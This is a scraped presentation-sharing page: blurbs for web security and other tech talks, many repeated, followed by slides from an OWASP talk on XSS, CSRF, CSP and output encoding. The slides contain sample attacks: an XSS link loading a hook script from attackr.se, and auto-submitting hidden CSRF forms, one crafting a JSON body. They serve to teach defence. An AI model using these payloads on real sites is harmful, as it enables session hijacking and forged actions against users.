My presentation from Framsia.
Topics:
XSS (reflected, stored, dom-based)
CSRF
Clickjacking
Header based approaches (CSP, X-frame-options)
EcmaScript5
HTML5
Some slides borrowed from John Wilander http://www.slideshare.net/johnwilander/application-security-for-rias
Client side security course by Tal Be'ery presented for Verint, late 2013 - presentation 2 out of 3
Script injection attacks: including Cross side scripting, Malvertizing, MITM
Client side security course by Tal Be'ery presented for Verint, late 2013 - presentation 3 out of 3
Non javascript attacks: including CSRF, attacks on SSL, CSS history, clickjacking
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
XXE Exposed Webinar Slides:
Brief coverage of SQLi and XSS against Web Services to then talk about XXE and XEE attacks and mitigation. Heavily inspired on the "Practical Web Defense" (PWD) style of pwnage + fixing (https://www.elearnsecurity.com/PWD)
Full recording here:
NOTE: (~20 minute) XXE + XEE Demo Recording starts at minute 25
https://www.elearnsecurity.com/collateral/webinar/xxe-exposed/
Client side security course by Tal Be'ery presented for Verint, late 2013 - presentation 1 out of 3
Intro to relevant technologies: HTTP, HTML, HTML5, javascript, same origin policy
A talk about browser extensions in Chrome & Safari, why they’re so great for web hackers and how to build them.
Given at JSConf EU on September 26th, 2010 in Berlin, Germany.
My presentation from Framsia.
Topics:
XSS (reflected, stored, dom-based)
CSRF
Clickjacking
Header based approaches (CSP, X-frame-options)
EcmaScript5
HTML5
Some slides borrowed from John Wilander http://www.slideshare.net/johnwilander/application-security-for-rias
Client side security course by Tal Be'ery presented for Verint, late 2013 - presentation 2 out of 3
Script injection attacks: including Cross side scripting, Malvertizing, MITM
Client side security course by Tal Be'ery presented for Verint, late 2013 - presentation 3 out of 3
Non javascript attacks: including CSRF, attacks on SSL, CSS history, clickjacking
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
XXE Exposed Webinar Slides:
Brief coverage of SQLi and XSS against Web Services to then talk about XXE and XEE attacks and mitigation. Heavily inspired on the "Practical Web Defense" (PWD) style of pwnage + fixing (https://www.elearnsecurity.com/PWD)
Full recording here:
NOTE: (~20 minute) XXE + XEE Demo Recording starts at minute 25
https://www.elearnsecurity.com/collateral/webinar/xxe-exposed/
Client side security course by Tal Be'ery presented for Verint, late 2013 - presentation 1 out of 3
Intro to relevant technologies: HTTP, HTML, HTML5, javascript, same origin policy
A talk about browser extensions in Chrome & Safari, why they’re so great for web hackers and how to build them.
Given at JSConf EU on September 26th, 2010 in Berlin, Germany.
When Ajax Attacks! Web application security fundamentalsSimon Willison
Web application security is hard, and getting harder. New technologies and techniques mean new vulnerabilities, and keeping on top of them all is a significant challenge. This talk will dive deep in to the underbelly of JavaScript security, exploring topics ranging from basic cross-site scripting to CSRF, social network worms, HTML sanitisation, securing JSON, safe cross-domain JavaScript and more besides.
Presented at @media Ajax 2008 on the 16th of September.
Bringing Typography to the Web with sIFR 3 at <head>Mark Wubben
Slides from my presentation on Web Typography and sIFR 3 at the <head> conference.
UPDATE: Something is broken in the notes I added, breaking all comments. Getting in touch with Slideshare to get that resolved. Screencasts can be found at http://files.11born.net/head08/
This presentation was used in OWASP Taiwan Week 2017 at Taipei & Kaohsiung. It talks about what Cross Site Request Forgery is, what are different ways to prevent it. And how it can be mitigated with OWASP CSRF Protector with just two lines of codes.
Attack Chaining: Advanced Maneuvers for Hack FuRob Ragan
Just as a good chess player thinks five moves ahead, a great penetration tester should be able to visualize their attack in order to compromise high-value targets. This presentation will explore how a penetration tester can learn to leverage attack chaining for maximum impact. A penetration test is supposed to be a simulation of a real-world attack. Real-world attackers do not use expensive automated tools or a checklist. Nor do they use a single technique or exploit to compromise a target. More commonly they combine several techniques, vulnerabilities, and exploits to create a “chained” attack that achieves a malicious goal. Chained attacks are far more complex and far more difficult to defend against. We want to explore how application vulnerabilities relate to one another and build a mind map that guides penetration testers through various attack scenarios. Prepare to be blown away on this roller coaster ride with real-world examples of massive compromises. If you are not a thrill seeker, this presentation may leave you a bit queasy.
Top Ten Web Hacking Techniques of 2008:
"What's possible, not probable"
The polls are closed, votes are in, and we have the winners making up the Top Ten Web Hacking Techniques of 2008! The competition was fierce with the newest and most innovative web hacking techniques to the test. This session will review the top ten hacks from 2008 - what they indicate about the security of the web, what they mean for businesses, and what might be used against us soon down the road.
DOM Based XSS (or as it is called in some texts, “type-0 XSS”) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner. Certain vulnerabilities in JavaScript code cannot be tracked by standard IDS or perimeter security measures, which leads to a huge potential vulnerability, the code can be abused to steal data or bypass authentication mechanisms in web interfaces. This presentation will demonstrate vulnerabilities and also present Minded Security’s latest countermeasure DOMinatorPro.
JavaScript is the most widely used language cross platforms. This talk will analyze the security concerns from past to present with a peek to the future of this important language. This talk was presented as Keynote at CyberCamp Espana 2014.
Roberto Bicchierai - Defending web applications from attacksPietro Polsinelli
Is my web application exposed? We will present a short guide for the "contemporary developer" of web apps: we will survey the critical points of our web apps, the database, session stealing, cookies. We will then review the most common attacks from DOS to XSS to CSRF and ways to defend and / or limit damages.
I Don't Care About Security (And Neither Should You)Joel Lord
Remember when setting up an auth system was easy? Me neither. From the signup form, the login form, password reset form, and all the validation in between it can easily take weeks if not months to get something basic up and running. Then you have to deal with all the security considerations. No thanks. During this presentation, the attendees will be introduced to OpenID and OAuth. They will learn how to leverage these technologies to create secure applications, but most importantly, they will learn why and how to delegate authorization and authentication so they can focus on their real work and forget about all that security stuff.
I Don't Care About Security (And Neither Should You)Joel Lord
Remember when setting up an auth system was easy? Me neither. From the signup form, the login form, password reset form, and all the validation in between it can easily take weeks if not months to get something basic up and running. Then you have to deal with all the security considerations. No thanks. During this presentation, the attendees will be introduced to OpenID and OAuth. They will learn how to leverage these technologies to create secure applications, but most importantly, they will learn why and how to delegate authorization and authentication so they can focus on their real work and forget about all that security stuff.
It's time to deprecate JavaScript. It's security model and the language itself are appalling.
As data moves into the cloud the JavaScript threat is increasing and I believe the only way to fix this is to start all over again. The 14 year old language and security model aren't up to today's threats.
When Ajax Attacks! Web application security fundamentalsSimon Willison
Web application security is hard, and getting harder. New technologies and techniques mean new vulnerabilities, and keeping on top of them all is a significant challenge. This talk will dive deep in to the underbelly of JavaScript security, exploring topics ranging from basic cross-site scripting to CSRF, social network worms, HTML sanitisation, securing JSON, safe cross-domain JavaScript and more besides.
Presented at @media Ajax 2008 on the 16th of September.
Bringing Typography to the Web with sIFR 3 at <head>Mark Wubben
Slides from my presentation on Web Typography and sIFR 3 at the <head> conference.
UPDATE: Something is broken in the notes I added, breaking all comments. Getting in touch with Slideshare to get that resolved. Screencasts can be found at http://files.11born.net/head08/
This presentation was used in OWASP Taiwan Week 2017 at Taipei & Kaohsiung. It talks about what Cross Site Request Forgery is, what are different ways to prevent it. And how it can be mitigated with OWASP CSRF Protector with just two lines of codes.
Attack Chaining: Advanced Maneuvers for Hack FuRob Ragan
Just as a good chess player thinks five moves ahead, a great penetration tester should be able to visualize their attack in order to compromise high-value targets. This presentation will explore how a penetration tester can learn to leverage attack chaining for maximum impact. A penetration test is supposed to be a simulation of a real-world attack. Real-world attackers do not use expensive automated tools or a checklist. Nor do they use a single technique or exploit to compromise a target. More commonly they combine several techniques, vulnerabilities, and exploits to create a “chained” attack that achieves a malicious goal. Chained attacks are far more complex and far more difficult to defend against. We want to explore how application vulnerabilities relate to one another and build a mind map that guides penetration testers through various attack scenarios. Prepare to be blown away on this roller coaster ride with real-world examples of massive compromises. If you are not a thrill seeker, this presentation may leave you a bit queasy.
Top Ten Web Hacking Techniques of 2008:
"What's possible, not probable"
The polls are closed, votes are in, and we have the winners making up the Top Ten Web Hacking Techniques of 2008! The competition was fierce with the newest and most innovative web hacking techniques to the test. This session will review the top ten hacks from 2008 - what they indicate about the security of the web, what they mean for businesses, and what might be used against us soon down the road.
DOM Based XSS (or as it is called in some texts, “type-0 XSS”) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner. Certain vulnerabilities in JavaScript code cannot be tracked by standard IDS or perimeter security measures, which leads to a huge potential vulnerability, the code can be abused to steal data or bypass authentication mechanisms in web interfaces. This presentation will demonstrate vulnerabilities and also present Minded Security’s latest countermeasure DOMinatorPro.
JavaScript is the most widely used language cross platforms. This talk will analyze the security concerns from past to present with a peek to the future of this important language. This talk was presented as Keynote at CyberCamp Espana 2014.
Roberto Bicchierai - Defending web applications from attacksPietro Polsinelli
Is my web application exposed? We will present a short guide for the "contemporary developer" of web apps: we will survey the critical points of our web apps, the database, session stealing, cookies. We will then review the most common attacks from DOS to XSS to CSRF and ways to defend and / or limit damages.
I Don't Care About Security (And Neither Should You)Joel Lord
Remember when setting up an auth system was easy? Me neither. From the signup form, the login form, password reset form, and all the validation in between it can easily take weeks if not months to get something basic up and running. Then you have to deal with all the security considerations. No thanks. During this presentation, the attendees will be introduced to OpenID and OAuth. They will learn how to leverage these technologies to create secure applications, but most importantly, they will learn why and how to delegate authorization and authentication so they can focus on their real work and forget about all that security stuff.
I Don't Care About Security (And Neither Should You)Joel Lord
Remember when setting up an auth system was easy? Me neither. From the signup form, the login form, password reset form, and all the validation in between it can easily take weeks if not months to get something basic up and running. Then you have to deal with all the security considerations. No thanks. During this presentation, the attendees will be introduced to OpenID and OAuth. They will learn how to leverage these technologies to create secure applications, but most importantly, they will learn why and how to delegate authorization and authentication so they can focus on their real work and forget about all that security stuff.
It's time to deprecate JavaScript. It's security model and the language itself are appalling.
As data moves into the cloud the JavaScript threat is increasing and I believe the only way to fix this is to start all over again. The 14 year old language and security model aren't up to today's threats.
OWASP SF - Reviewing Modern JavaScript ApplicationsLewis Ardern
When dealing with modern JavaScript applications, many penetration testers approach from an ‘out-side-in’ perspective, this is approach often misses security issues in plain sight. This talk will attempt to demystify common JavaScript issues which should be better understood/identified during security reviews. We will discuss reviewing applications in code-centric manner by using freely available tools to help start identifying security issues through processes such as linting and dependency auditing.
Null Mumbai 14th May Lesser Known Webapp attacks by Ninad Sarangnullowaspmumbai
Agenda
We will cover lesser known web application attacks with there basics, how to do and mitigations.
Cross site scripting –
* Mutation XSS
* RPO XSS
* Zombie XSS
Remote Command Execution
CR-LF Attack
Homograph Attack
Introduction to Cross Site Scripting ( XSS )Irfad Imtiaz
Contents :
- Introduction
- Description as A Widely Used Hacking Technique
- How it is used in Hacking
- What can be done with XSS
#XSS, #Hacking, #Security, #CookieStealing, #InternetBug, #HTMLInjection
Sincerely,
Irfad Imtiaz
Text Editors (Atom / Sublime)
Apache Server (sftp/ssh/php) – Todd's Server!
CPanel / Wordpress (server side details)
Working with any Web API (Mapping Example)
(facebook, linkedin, twitter, maps, d3.js, jquary)
JSON and HTML <img>
GIT http://www.github.com
A presentation on the programming language JavaScript. It covers types, object orientation, variables and scope, closures, the Crockford Module Pattern, loading and executing, imports and namespacing, and more. The language features are compared to Java throughout the slides.
Web Integration Patterns in the Era of HTML5johnwilander
Presentation given at OWASP BeNeLux November 2012 and GeekMeet Stockholm January 2013. Covers secure and robust integration patterns for the web using cross origin resource sharing (CORS), sandboxed iframes, and the postMessage API.
Application Security, in Six Parts (HackPra 2012)johnwilander
My (@johnwilander) talk at HackPra 2012, Bochum, Germany. It covers things I've been doing in software and application security the last ten years. Not all of it but the good parts. Enjoy!
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...Neo4j
Leonard Jayamohan, Partner & Generative AI Lead, Deloitte
This keynote will reveal how Deloitte leverages Neo4j’s graph power for groundbreaking digital twin solutions, achieving a staggering 100x performance boost. Discover the essential role knowledge graphs play in successful generative AI implementations. Plus, get an exclusive look at an innovative Neo4j + Generative AI solution Deloitte is developing in-house.
Securing your Kubernetes cluster_ a step-by-step guide to success !KatiaHIMEUR1
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
Communications Mining Series - Zero to Hero - Session 1DianaGray10
This session provides introduction to UiPath Communication Mining, importance and platform overview. You will acquire a good understand of the phases in Communication Mining as we go over the platform with you. Topics covered:
• Communication Mining Overview
• Why is it important?
• How can it help today’s business and the benefits
• Phases in Communication Mining
• Demo on Platform overview
• Q/A
UiPath Test Automation using UiPath Test Suite series, part 5DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 5. In this session, we will cover CI/CD with devops.
Topics covered:
CI/CD with in UiPath
End-to-end overview of CI/CD pipeline with Azure devops
Speaker:
Lyndsey Byblow, Test Suite Sales Engineer @ UiPath, Inc.
UiPath Test Automation using UiPath Test Suite series, part 6DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 6. In this session, we will cover Test Automation with generative AI and Open AI.
UiPath Test Automation with generative AI and Open AI webinar offers an in-depth exploration of leveraging cutting-edge technologies for test automation within the UiPath platform. Attendees will delve into the integration of generative AI, a test automation solution, with Open AI advanced natural language processing capabilities.
Throughout the session, participants will discover how this synergy empowers testers to automate repetitive tasks, enhance testing accuracy, and expedite the software testing life cycle. Topics covered include the seamless integration process, practical use cases, and the benefits of harnessing AI-driven automation for UiPath testing initiatives. By attending this webinar, testers, and automation professionals can gain valuable insights into harnessing the power of AI to optimize their test automation workflows within the UiPath ecosystem, ultimately driving efficiency and quality in software development processes.
What will you get from this session?
1. Insights into integrating generative AI.
2. Understanding how this integration enhances test automation within the UiPath platform
3. Practical demonstrations
4. Exploration of real-world use cases illustrating the benefits of AI-driven test automation for UiPath
Topics covered:
What is generative AI
Test Automation with generative AI and Open AI.
UiPath integration with generative AI
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Removing Uninteresting Bytes in Software FuzzingAftab Hussain
Imagine a world where software fuzzing, the process of mutating bytes in test seeds to uncover hidden and erroneous program behaviors, becomes faster and more effective. A lot depends on the initial seeds, which can significantly dictate the trajectory of a fuzzing campaign, particularly in terms of how long it takes to uncover interesting behaviour in your code. We introduce DIAR, a technique designed to speedup fuzzing campaigns by pinpointing and eliminating those uninteresting bytes in the seeds. Picture this: instead of wasting valuable resources on meaningless mutations in large, bloated seeds, DIAR removes the unnecessary bytes, streamlining the entire process.
In this work, we equipped AFL, a popular fuzzer, with DIAR and examined two critical Linux libraries -- Libxml's xmllint, a tool for parsing xml documents, and Binutil's readelf, an essential debugging and security analysis command-line tool used to display detailed information about ELF (Executable and Linkable Format). Our preliminary results show that AFL+DIAR does not only discover new paths more quickly but also achieves higher coverage overall. This work thus showcases how starting with lean and optimized seeds can lead to faster, more comprehensive fuzzing campaigns -- and DIAR helps you find such seeds.
- These are slides of the talk given at IEEE International Conference on Software Testing Verification and Validation Workshop, ICSTW 2022.
A tale of scale & speed: How the US Navy is enabling software delivery from l...sonjaschweigert1
Rapid and secure feature delivery is a goal across every application team and every branch of the DoD. The Navy’s DevSecOps platform, Party Barge, has achieved:
- Reduction in onboarding time from 5 weeks to 1 day
- Improved developer experience and productivity through actionable findings and reduction of false positives
- Maintenance of superior security standards and inherent policy enforcement with Authorization to Operate (ATO)
Development teams can ship efficiently and ensure applications are cyber ready for Navy Authorizing Officials (AOs). In this webinar, Sigma Defense and Anchore will give attendees a look behind the scenes and demo secure pipeline automation and security artifacts that speed up application ATO and time to production.
We will cover:
- How to remove silos in DevSecOps
- How to build efficient development pipeline roles and component templates
- How to deliver security artifacts that matter for ATO’s (SBOMs, vulnerability reports, and policy evidence)
- How to streamline operations with automated policy checks on container images
Pushing the limits of ePRTC: 100ns holdover for 100 daysAdtran
At WSTS 2024, Alon Stern explored the topic of parametric holdover and explained how recent research findings can be implemented in real-world PNT networks to achieve 100 nanoseconds of accuracy for up to 100 days.
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfMalak Abu Hammad
Discover how MongoDB Atlas and vector search technology can revolutionize your application's search capabilities. This comprehensive presentation covers:
* What is Vector Search?
* Importance and benefits of vector search
* Practical use cases across various industries
* Step-by-step implementation guide
* Live demos with code snippets
* Enhancing LLM capabilities with vector search
* Best practices and optimization strategies
Perfect for developers, AI enthusiasts, and tech leaders. Learn how to leverage MongoDB Atlas to deliver highly relevant, context-aware search results, transforming your data retrieval process. Stay ahead in tech innovation and maximize the potential of your applications.
#MongoDB #VectorSearch #AI #SemanticSearch #TechInnovation #DataScience #LLM #MachineLearning #SearchTechnology
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
Unlocking Productivity: Leveraging the Potential of Copilot in Microsoft 365, a presentation by Christoforos Vlachos, Senior Solutions Manager – Modern Workplace, Uni Systems
2. Frontend developer at
Svenska Handelsbanken
Researcher in application security
Co-leader OWASP Sweden
@johnwilander
johnwilander.com (music)
OWASP == The Open Web
Application Security Project
Cheat sheets, tools, code, guidelines
https://owasp.org
3. ÅåÄäÖö
The above three extra letters are Swedish developers’
biggest problem. Help us – use UTF-8!
4. OWASP Top 10
Top web application
security risks 2010
5. 1. Injection
2. Cross-Site Scripting (XSS)
3. Broken Authentication and Session
Management
4. Insecure Direct Object References
5. Cross-Site Request Forgery (CSRF)
6. Security Misconfiguration
7. Insecure Cryptographic Storage
8. Failure to Restrict URL Access
9. Insufficient Transport Layer Protection
10. Unvalidated Redirects and Forwards
19. Cross-Site Scripting
Type 0, DOM-based
g
ip tin
Scr
Cros
No server roundtrip!
s-Sit
e
Also, single-page interfaces
make injected scripts ”stick”
Ph
isi
in thenDOM.
g
22. Would you click this?
https://secure.bank.com/authentication
#language=<script src="http://attackr.se:
3000/hook.js"></script>&country=SE
23. Would you click this?
https://secure.bank.com/authentication
#language=%3Cscript%20src%3D%22http%3A%2F
%2Fattackr.se%3A3000%2Fhook.js%22%3E%3C
%2Fscript%3E&country=SE
25. Filter out <script>?
var ... ,
stripScriptsRe = /(?:<script.*?>)((n|r|.)*?)(?:</script>)/ig,
/**
* Strips all script tags
* @param {Object} value The text from which to strip script tags
* @return {String} The stripped text
*/
stripScripts : function(v) {
return !v ? v : String(v).replace(stripScriptsRe, "");
},
http://docs.sencha.com/ext-js/4-0/#!/api/Ext.util.Format-method-stripScripts
36. The Patch™
var c = location.href.split("#!")[1];
if (c) {
window.location = c.replace(":", "");
} else {
return true;
}
37. The Patch™
var c = location.href.split("#!")[1];
if (c) {
window.location = c.replace(":", "");
} else {
return true;
}
Replaces the first occurance
of the search string
40. The 2nd Patch™
(function(g){
var a = location.href.split("#!")[1];
if(a) {
g.location = a.replace(/:/gi,"");
}
})(window);
41. (function(g){
var a = location.href.split("#!")[1];
if(a) {
g.location = a.replace(/:/gi,"");
}
})(window); Regexp pattern
delimiters
42. (function(g){
var a = location.href.split("#!")[1];
if(a) {
g.location = a.replace(/:/gi,"");
}
})(window); Regexp pattern
delimiters
Global match
43. (function(g){
var a = location.href.split("#!")[1];
if(a) {
g.location = a.replace(/:/gi,"");
}
})(window); Regexp pattern
delimiters
Global match Ignore case
47. The n:th Patch™
(this one works)
(function(g){
var a = location.href.split("#!")[1];
if(a) {
g.location.pathname = a;
}
})(window);
And hey, Twitter is doing the right thing: https://twitter.com/about/security
49. https://github.com/chrisisbeef/jquery-encoder
• $.encoder.canonicalize()
Throws Error for double encoding or multiple encoding
types, otherwise transforms %3CB%3E to <b>
• $.encoder.encodeForCSS()
Encodes for safe usage in style attribute and style()
• $.encoder.encodeForHTML()
Encodes for safe usage in innerHTML and html()
• $.encoder.encodeForHTMLAttribute()
Encodes for safe usage in HTML attributes
• $.encoder.encodeForJavaScript()
Encodes for safe usage in event handlers etc
• $.encoder.encodeForURL()
Encodes for safe usage in href etc
50. https://github.com/chrisisbeef/jquery-encoder
• $.encoder.canonicalize()
Throws Error for double encoding or multiple encoding
types, otherwise transforms %3CB%3E to <b>
• $.encoder.encodeForCSS()
Encodes for safe usage in style attribute and style()
• $.encoder.encodeForHTML()
Encodes for safe usage in innerHTML and html()
• $.encoder.encodeForHTMLAttribute()
Encodes for safe usage in HTML attributes
• $.encoder.encodeForJavaScript()
Encodes for safe usage in event handlers etc
• $.encoder.encodeForURL()
Encodes for safe usage in href etc
52. Also, check out ...
Content Security Policy
http://people.mozilla.com/~bsterne/
content-security-policy/
53. New HTTP Response
Header Saying ...
Only allow scripts from whitelisted domains
and
only allow scripts from files, i.e. no inline scripts
54. 'self' = same URL, protocol and port
X-Content-Security-Policy: default-src 'self'
Accept all content including scripts only from my own URL+port
X-Content-Security-Policy: default-src *;
script-src trustedscripts.foo.com
Accept media only from my URL+port (images, stylesheets,
fonts, ...) and scripts only from trustedscripts.foo.com
58. Is www.attackr.se allowed to
load images like this:
<img src=”https://secure.bank.com/
logo.png" />
?
59. Is www.attackr.se allowed to
load images like this:
<img src=”https://secure.bank.com/
authentication#language=sv&country=SE" />
?
60. With image tags www.attackr.se can silently
send HTTP GET requests to any domain
<img src=”https://secure.bank.com/
authentication#language=sv&country=SE"
height=0 width=0 />
66. What’s on your mind? What’s on your mind?
POST I hate OWASP! POST
67. What’s on your mind? What’s on your mind?
POST I hate OWASP! POST
68. What’s on your mind? What’s on your mind?
POST I hate OWASP! POST
John: I hate OWASP!
69. What’s on your mind? What’s on your mind?
POST <form id="target" method="POST"
action="https://1-liner.org/form">
John: I hate OWASP! <input type="text" value="I hate
OWASP!" name="oneLiner"/>
<input type="submit"
value="POST"/>
</form>
<script type="text/javascript">
$(document).ready(function() {
$('#form').submit();
});
</script>
70. <form id="target" method="POST"
action="https://1-liner.org/form">
<input type="text" value="I hate
OWASP!" name="oneLiner"/>
<input type="submit"
What’s on your mind? What’s on your mind?
value="POST"/>
POST
</form>
John: I hate OWASP!
<script>
$(document).ready(function() {
$('#target').submit();
});
</script>
89. <form id="target" method="POST"
action="https://vulnerable.1-liner.org:
8444/ws/oneliners"
style="visibility:hidden"
enctype="text/plain">
Forms produce a request body that
<input type="text" like this:
looks
name=””
value="" /> theName=theValue
... and that’s not valid JSON.
<input type="submit" value="Go" />
</form>
91. <form id="target" method="POST"
action="https://vulnerable.1-liner.org:
8444/ws/oneliners"
style="visibility:hidden"
Produces a request body that looks
enctype="text/plain">
like this:
<input type="text"
{"id": 0, "nickName":
name='{"id": 0, "nickName": "John",
"John","oneLiner": "I
"oneLiner": "I hate OWASP!",
hate OWASP!","timestamp":
"timestamp": "20111006"}//'
"20111006"}//=dummy
value="dummy" />
... and that is acceptable JSON!
<input type="submit" value="Go" />
</form>
93. Demo XSS + CSRF with
The Browser Exploitation Framework
http://beefproject.com/
94. Important in your
REST API
• Restrict HTTP method, e.g. POST
Easier to do CSRF with GET
• Restrict to AJAX if applicable
X-Requested-With:XMLHttpRequest
Cross-domain AJAX prohibited by default
• Restrict media type(s), e.g. application/json
HTML forms only allow URL encoded, multi-part
and text/plain
95. Attacker may spoof
headers via Flash proxy
http://lists.webappsec.org/pipermail/
websecurity_lists.webappsec.org/2011-
February/007533.html
105. How To Get It Right
• Join your local OWASP chapter
https://www.owasp.org/index.php/OWASP_Chapter
• Start following these fellas on Twitter:
@WisecWisec @0x6D6172696F @garethheyes
@internot_ @securityninja @jeremiahg
@kkotowicz @webtonull @manicode @_mwc
• Start hacking – it’s fun!
Best place to start? Your own apps of course.
Just stay legal ;)